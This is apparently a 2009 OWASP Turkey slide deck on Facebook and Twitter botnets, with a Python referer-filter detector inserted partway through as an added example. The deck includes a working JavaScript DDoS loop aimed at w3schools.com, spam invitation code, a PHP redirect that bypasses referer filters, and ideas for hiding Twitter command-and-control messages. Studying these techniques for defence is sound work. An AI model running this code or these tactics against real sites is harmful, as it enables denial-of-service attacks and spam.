Facebook, Twitter and Botnets
OWASP Turkey Chapter
September 26 2009
Istanbul
Botnet
• Collection of software robots, or bots, that run
autonomously and automatically
• Botnet in its simplest form is an army of
compromised computers that take orders from a
botherder
• Botnets are arguably the biggest threat that the
Internet community has faced
• Most popular Botnet Type: “IRC Channels based
Botnets”
• Lately Social Networking Sites based Botnets
Puppetnet
• Puppetnets rely on websites that coerce web browsers to
participate in Malicious activities
• Such activities include
– distributed denial-of-service
– worm propagation
– reconnaissance probing
• Puppetnets exploit the high degree of flexibility granted to
the mechanisms comprising the web architecture
• A website under the control of an attacker can thereby
transform a collection of web browsers into a distributed
system that is effectively controlled by the attacker
• Puppetnets can instruct any web browser to engage in
malicious activities
Puppetnet
• Participation in puppetnets is dynamic
• Users join and participate unknowingly while surfing
the net
• Easy to maintain a reasonable population, without the
burden of having to look for new victims
• Harder for the defenders to track and filter out attacks,
as puppets are likely to be relatively short-lived
• Only indirectly misuse browsers to attack third parties
• http://www.ics.forth.gr/dcs/Activities/papers/TISSEC.puppetnets.2007.pdf
Puppetnet Diagram
(Figure: the Malicious Web Server exchanges HTTP requests and responses, which also carry the attack commands, with the Web Clients; the Web Clients then send the Attack Traffic to the Victim Site)
What can be done via Puppetnets
• Image Reference
• Loading image objects through Javascript
• Open up pop-up Windows
• Creation of Frames to load remote objects
* No browser imposes restrictions on the location or type of the
target referenced through these mechanisms
Puppetnet DDoS
Firepower of DDoS Attack = (Number of users concurrently viewing the
malicious page on their web browser) * (Amount of bandwidth each of
these users can generate towards the target server)
• What is more important?
– Size of Puppetnet?
– Sufficient Firepower for a typical DDoS scenario?
• Determine how much “traffic” a browser can
typically generate under the attacker’s command
Facebook
• Facebook is a global social networking website
that is operated and privately owned by
Facebook, Inc.
• Users can
– add friends
– send them messages
– update their personal profiles to notify friends about
themselves
– join networks organized by city, workplace, school,
and region
Application Development in Facebook
• Options while creating FaceBook applications
• Option1:
Port an existing application to FaceBook by using iframe
• Option2:
Develop an application by using FBML, FBJS, FQL and FB API
• Create an application in FaceBook
• FaceBook API
• Facebook Markup Language (FBML)
• Facebook Query Language (FQL)
• Facebook Javascript (FBJS)
Facebook Application (How does it work?)
– Callback metaphor to interact with applications
– The URL of the application is associated with a
registered application in Facebook
– When the Facebook application URL is requested,
Facebook redirects the request to the application server
– The application processes the request, communicates
with Facebook using the Facebook Application
Programming Interface (API) or Facebook Query
Language (FQL)
– Returns Facebook Markup Language (FBML) to
Facebook for presentation
Facebook Dynamics
• FaceBook API
– Web services programming interface for accessing core services
• profile
• friends
• group
• event
• photo
– Performs other Facebook-centric functionality
• log in
• redirect
• update view
• Facebook Markup Language (FBML)
– HTML-like language
– Display pages inside of the Facebook canvas
Facebook Dynamics
• Facebook Query Language (FQL)
– SQL-based interface into Facebook data.
– Similar to standard SQL
– Access many Facebook database tables
• user
• friend
• group
• group_member
• event
• event_member
• photo
• album
• photo_tag
– Restrictions
• SELECT statements must be performed one table at a time
• Join queries are not permitted
• Queries must be indexable.
Facebook Dynamics
• Facebook Javascript (FBJS)
– Allows limited scripting functionality
– Alternative DOM implementation
– Similar to Standard JavaScript
– Differs from standard JavaScript
• While accessing a JavaScript property (such as document.href), FBJS
uses a pair of get and set methods instead (getHref, setHref)
• While processing scripting code inside of script elements, tacks on the
application ID to function and variable names
• Prevents the ability to run any javascript code you want
• FBJS transformed on the fly into JavaScript as the page is loaded
• All variables and functions are prepended with a string like
"xyz3455679_"
• Restriction on what can be done with DOM elements
• Avoids cross-site-scripting attacks and hostile user behavior
Facebook Platform
• Standards-based programming framework
– Enables developers to create applications that
interact and integrate with core Facebook services
– Facebook applications are not installed directly
onto the Facebook server. Instead, they are placed
on the developer’s server
– Facebook applications are called by Facebook
when the application URL is requested
Facebook Application Diagram (How does it work?)
1. The Facebook server receives a URL request for the
application (apps.facebook.com/uygulama)
2. Facebook calls the Callback URL on the server where
the application resides
3. The application evaluates the request, obtains the
Facebook data from Facebook via the API or FQL, and
sends it back to Facebook as FBML for the user
to see.
4. Facebook receives the FBML response, renders it
inside the Facebook Canvas and sends the HTML to
the browser that initiated the request.
What kind of a Facebook Application?
• A simple application?
• A popular application?
• Game or Utility?
• Fan based Program?
• Continuous Usage?
• A program that creates Programs?
• TOS?
Facebook-TOS
• http://www.facebook.com/terms.php
– Privacy
– Sharing Your Content and Information
– Safety
– Registration and Account Security
– Protecting Other People's Rights
– Mobile
– Payments
– Special Provisions Applicable to Share Links
– Special Provisions Applicable to Developers/Operators of Applications
and Websites
– About Advertisements on Facebook
– Special Provisions Applicable to Advertisers
– Special Provisions Applicable to Pages
Facebook - TOS - Safety
• Safety
• You will not upload viruses or other malicious code.
• You will not collect users' content or information, or
otherwise access Facebook, using automated means (such
as harvesting bots, robots, spiders, or scrapers) without
our permission.
• You will not use Facebook to do anything unlawful,
misleading, malicious, or discriminatory.
• You will not do anything that could disable, overburden, or
impair the proper working of Facebook, such as a denial of
service attack.
Facebook - TOS - Provisions Applicable
to Developers
• Special Provisions Applicable to
Developers/Operators of Applications and
Websites
– You will only request data you need to operate your
application.
– You will not use, display, or share a user's data in a
manner inconsistent with the user's privacy settings.
– You will delete all data you received from Facebook if
we disable your application or ask you to do so.
Facebook Revocation Email
Botnet Creation in Facebook
• Image Reference
– Inline linking
• Use of a linked object (usually an image)
• Using it from one site into a web page belonging to a second site
• The second site is said to have an inline link to the site where the
object is located
• When a web site is visited
– Browser first downloads the textual content in the form of an HTML
document
– The downloaded HTML document may call for other HTML files to be
processed
– It also permits absolute URLs that refer to images hosted on other servers
(<img src="http://www.example.com/picture.jpg" />)
– When a browser downloads an HTML page containing such an image, the
browser will contact the remote server to request the image content
Botnet Creation in Facebook
• Image Reference
– A single line like
• echo "<fb:iframe frameborder=\"0\" width=\"0px\" height=\"0px\"
src=\"http://www.w3schools.com/js/venus.jpg\" />";
– Good enough to create a DDoS attack against the src; the victim
site is w3schools.com in the above example
– An iframe which downloads an image with a width
and height set to 0px
– Browser fetches the page above and does not show it
– Change width and height and see the picture
Botnet Creation in Facebook
• How to Create a large number of requests to the target site?
– Embed a sequence of image references in the malicious webpage, which can be done using either a
sequence of IMG SRC instructions
– or a JavaScript loop that instructs the browser to load objects from the target server
• Loading image objects through Javascript
<SCRIPT>
pic= new Image(10,10);
function DDOS() {
var now = new Date();
pic.src='http://www.w3schools.com/js?'+now.getTime();
setTimeout ( "DDOS()", 10 );
return;
}
</SCRIPT>
<IFRAME name='parent' width="0%" src="page.htm" onLoad="DDOS()">
</IFRAME>
Propagation of Facebook Botnet
• Create an Application
• Make it nice and fun !(Really important)
• Advertise it by using Facebook features:
– News Feed
– Invitation (Limit 20 a day)
$invite_text = htmlentities($invite_text);
echo "<fb:request-form type='Kim Silmis' content='$invite_text' action='index.php' method='POST'
invite='true' >";
echo "<fb:multi-friend-selector showborder='true' max ='20' actiontext='Kim Silmiş programı ile sizi
arkadaş listesinden silenleri görmek ister misiniz?' exclude_ids='$exclude_list' >";
echo "</fb:request-form>";
– Notification
$facebook->api_client->notifications_send($friends[1], 'Kim silmis kullaniyor. Siz de <a
href="http://apps.facebooks.com/kilsilmis">Kim silmis</a> kullanarak zevkle zaman geçirebilirsiniz. ');
Detection of Facebook Botnet
• Victim host must filter out all incoming traffic introduced by
Facebook users.
– Use the referer field of the HTTP requests
– Determine whether a request originates from facebook.com or not
– Stop the attack traffic accordingly
• It is possible for a Facebook application developer to get around
this filter by bouncing the request through a page on a host under the attacker's control:
src=http://attack-host/dummy-page?ref=victim-host/image1.jpg
<?php
if ($_GET["ref"]) { $ref=$_GET["ref"]; }
print("<meta http-equiv='refresh' content='0; url=$ref'>");
?>
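The referer filter described above, and the bounce-page caveat that follows it, as an added example (not code from the original slides): a small Python script that parses constructed Apache combined-format log lines, drops requests whose Referer is facebook.com or one of its subdomains, and additionally flags requests whose Referer is some other host but carries the protected host's name inside its query string, which is what the meta-refresh bounce leaves behind. The host names attack-host and victim-host are the placeholders used on the slides; the log lines and IP addresses are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Hostname of the site being protected (assumed value for this example).
VICTIM_HOST = "victim-host"

# Constructed Apache combined-format log lines; not taken from any real server.
SAMPLE_LOG = """\
203.0.113.10 - - [26/Sep/2009:10:00:01 +0300] "GET /picture.jpg HTTP/1.1" 200 5120 "http://www.example.com/gallery.html" "Mozilla/5.0"
198.51.100.23 - - [26/Sep/2009:10:00:02 +0300] "GET /js?1253952002001 HTTP/1.1" 404 210 "http://apps.facebook.com/someapp/" "Mozilla/5.0"
198.51.100.24 - - [26/Sep/2009:10:00:02 +0300] "GET /js?1253952002011 HTTP/1.1" 404 210 "http://apps.facebook.com/someapp/" "Mozilla/5.0"
198.51.100.25 - - [26/Sep/2009:10:00:03 +0300] "GET /image1.jpg HTTP/1.1" 200 5120 "http://attack-host/dummy-page?ref=victim-host/image1.jpg" "Mozilla/5.0"
198.51.100.26 - - [26/Sep/2009:10:00:03 +0300] "GET /image1.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def referer_host(referer):
    """Lower-cased hostname of the Referer, or None when the header is absent ('-')."""
    if referer in ("", "-"):
        return None
    return (urlparse(referer).hostname or "").lower()


def is_facebook_host(host):
    # Matches facebook.com and any subdomain such as apps.facebook.com.
    return host == "facebook.com" or host.endswith(".facebook.com")


def verdict(entry):
    """Decide what to do with one request based on its Referer."""
    host = referer_host(entry["referer"])
    if host is None:
        return "no-referer"          # filter cannot decide; needs rate-based controls
    if is_facebook_host(host):
        return "block"               # the basic rule from the slides
    # Bounce pattern: another host's page whose query string names our own host.
    query = parse_qs(urlparse(entry["referer"]).query)
    if any(VICTIM_HOST in value for values in query.values() for value in values):
        return "suspect-redirect"
    return "allow"


def summarize(log_text):
    """Count verdicts over a whole log; unparsable lines are counted separately."""
    counts = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            counts["unparsed"] += 1
            continue
        counts[verdict(entry)] += 1
    return dict(counts)


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        entry = parse_line(line)
        print(f"{entry['ip']:<15} {entry['path']:<20} {verdict(entry)}")
    print(summarize(SAMPLE_LOG))
```

The "no-referer" and "suspect-redirect" buckets are the point of the exercise: a rule that only checks for facebook.com catches the direct fb:iframe case but says nothing about requests arriving without a Referer or via an intermediate page, so those buckets should feed a request-rate limit per source address rather than being treated as clean.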
Prevention of Facebook Botnet
• Social network providers should be careful with the use
of client side technologies, like JavaScript, etc.
• Social network operator should provide developers
with a strict API, which is capable of giving access to
resources only related to the system.
• Applications should run in an isolated environment
imposing constraints to prevent the application from
interacting with other Internet hosts
• Facebook Platform can cancel the use of fb:iframe tag,
as this tag is used to load images hosted at the victim
host.
Facebook PoC Facebot
• www.ics.forth.gr/dcs/Activities/papers/facebot.isc08.pdf
Twitter
• Free social networking and micro-blogging
service
• Enables users to send and read messages known
as tweets
• Tweets are text-based posts of up to
140 characters displayed on the author's profile
page and delivered to the author's followers
• Senders can restrict delivery to those in their
circle of friends or allow open access
Twitter
• Profile (Name, Location, Bio)
• Find People (Twitter, Other Networks, Emails, Suggested Users)
• @
• RT
• Direct Message
• #
• http://search.twitter.com
• Favorites
• RSS
Twitter Botnet?
• Reasons
– Ability to hide random commands in the large amount of data that is generated each day
– A really good API that would make integration easy
• Ideas
– Option1: A protected twitter account that only the bots could read.
• Restriction on who could see the commands?
• Easy for Twitter to block the user
• PoC supposedly exists
– Option2: Send Commands to random accounts and then have the Bot use the search feature
to find the commands.
• Harder for Twitter to block the messages as the commands could be posted from any account to any other account.
• Bot would have to have a way to spot the commands in the general mess of other tweets out there.
• If the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets.
• Use seemingly innocent commands, such as "check out this link ..." instead of saying download a file
• Innocent commands would be hard for Twitter to block without upsetting legitimate users
• Additional Suggestions
– Using TinyURL to obfuscate commands
– Using hash tags to represent certain things
– Making bots to follow certain accounts to mark themselves as bots.
Twitter - POC
• Proof of Concept bot which uses Twitter as its
Command and Control channel at
http://www.digininja.org/projects/kreiosc2.php
• Waiting for Defcon 2009 Video Presented by
Kevin Johnson and Tom Eston
Thank you
• Ibrahim Halil Saruhan
Facebook: [email protected]
E-Mail: [email protected]
Questions?